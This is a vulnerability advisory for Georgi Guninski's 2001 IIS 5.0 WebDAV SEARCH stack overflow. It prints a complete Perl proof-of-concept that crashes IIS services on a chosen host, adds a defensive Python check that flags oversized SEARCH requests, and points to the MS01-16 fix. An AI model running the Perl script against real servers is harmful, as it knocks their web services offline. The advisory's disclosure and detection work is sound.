COMMAND

    IIS

SYSTEMS AFFECTED

    IIS 5.0

PROBLEM

    The following is Georgi Guninski security advisory #39, 2001. This
    may be a duplicate of advisory #38; sorry if this is the case.
    Microsoft did not answer questions about whether it is the same
    issue. By sending a valid (not malformed) but long SEARCH request to
    IIS 5.0 it is possible to restart all IIS related services.

    The interesting point is that the stack seems to be smashed, and
    Georgi believes this may lead to executing arbitrary code, though we
    have not achieved it. Details:

        #!/usr/bin/perl
        use IO::Socket;
        printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
        if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
        $port = @ARGV[1];
        $host = @ARGV[0];
        sub vv()
        {
        $ll=$_[0]; #length of buffer
        $ch=$_[1];
        $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
        $over=$ch x $ll; #string to overflow
        $xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
        $l=length($xml);
        $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
        syswrite($socket,$req,length($req));
        print ".";
        $socket->read($res,3000);
        print "r=".$res;
        close $socket;
        }
        do  vv(126000,"V");
        sleep(1);
        do  vv(126000,"V");
        #Try 125000 - 128000
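    As an added example, not part of the advisory or of Guninski's script,
    the following Python check parses a captured HTTP request and flags a
    WebDAV SEARCH whose DAV:sql SCOPE argument or body is far larger than
    any legitimate search would need; the size thresholds and the
    example.test host name are assumptions, and the sample requests are
    constructed inline in the shape the script above sends.

```python
import re

# Thresholds are assumptions for illustration. The advisory reports crashes
# with SCOPE strings of roughly 125000-128000 bytes; a legitimate WebDAV
# search scope is a path, so a few hundred bytes is already generous.
MAX_SCOPE_LEN = 1024
MAX_BODY_LEN = 8192

# Matches the SCOPE("...") clause inside a DAV:sql query body.
SCOPE_RE = re.compile(rb'SCOPE\s*\(\s*"([^"]*)"', re.IGNORECASE)


def inspect_request(raw: bytes) -> dict:
    """Parse a raw HTTP request and report why a SEARCH looks abusive.

    Returns {"method", "body_len", "scope_len", "reasons"}; an empty
    "reasons" list means the request is within the thresholds.
    """
    raw = raw.replace(b"\r\n", b"\n")            # tolerate CRLF line endings
    head, _, body = raw.partition(b"\n\n")       # headers end at a blank line
    method = head.split(b"\n", 1)[0].split(b" ", 1)[0].decode("ascii", "replace")
    report = {"method": method, "body_len": len(body), "scope_len": 0, "reasons": []}
    if method.upper() != "SEARCH":
        return report                            # only WebDAV SEARCH is of interest here
    if len(body) > MAX_BODY_LEN:
        report["reasons"].append("oversized SEARCH body")
    if b"searchrequest" in body:                 # DAV:searchrequest element present
        match = SCOPE_RE.search(body)
        if match:
            report["scope_len"] = len(match.group(1))
            if report["scope_len"] > MAX_SCOPE_LEN:
                report["reasons"].append("oversized SCOPE argument in DAV:sql")
    return report


def build_search(scope: bytes) -> bytes:
    """Constructed sample SEARCH request (not sent anywhere) for testing the check."""
    xml = (b'<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>'
           b'SELECT DAV:displayname from SCOPE("' + scope + b'")</D:sql></D:searchrequest>\n')
    return (b"SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: example.test\n"
            b"Content-length: " + str(len(xml)).encode() + b"\n\n" + xml)


if __name__ == "__main__":
    for label, scope in (("benign", b"/docs/"), ("advisory-sized", b"V" * 126000)):
        print(label, inspect_request(build_search(scope)))
```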

SOLUTION

    Some of the revisions of MS01-16 solve this issue, yet we do not
    recommend using IIS in a production environment.